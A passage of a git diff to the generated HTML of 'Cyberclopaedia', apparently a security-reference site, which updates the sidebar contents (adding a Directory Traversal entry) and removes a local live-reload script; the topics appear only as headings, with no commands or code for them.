      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -189,22 +189,6 @@

Operand Not - - diff --git a/docs/Reverse Engineering/Assembly Programming/x86-64/Memory.html b/docs/Reverse Engineering/Assembly Programming/x86-64/Memory.html index d9f8cd5e..14022b6d 100644 --- a/docs/Reverse Engineering/Assembly Programming/x86-64/Memory.html +++ b/docs/Reverse Engineering/Assembly Programming/x86-64/Memory.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -185,22 +185,6 @@

Memory Layout - - diff --git a/docs/Reverse Engineering/Assembly Programming/x86-64/Registers.html b/docs/Reverse Engineering/Assembly Programming/x86-64/Registers.html index 3100897f..e1eb6c37 100644 --- a/docs/Reverse Engineering/Assembly Programming/x86-64/Registers.html +++ b/docs/Reverse Engineering/Assembly Programming/x86-64/Registers.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -235,22 +235,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Reverse Engineering/Assembly Programming/x86-64/Variables.html b/docs/Reverse Engineering/Assembly Programming/x86-64/Variables.html index 517f2ed7..6e1f5240 100644 --- a/docs/Reverse Engineering/Assembly Programming/x86-64/Variables.html +++ b/docs/Reverse Engineering/Assembly Programming/x86-64/Variables.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
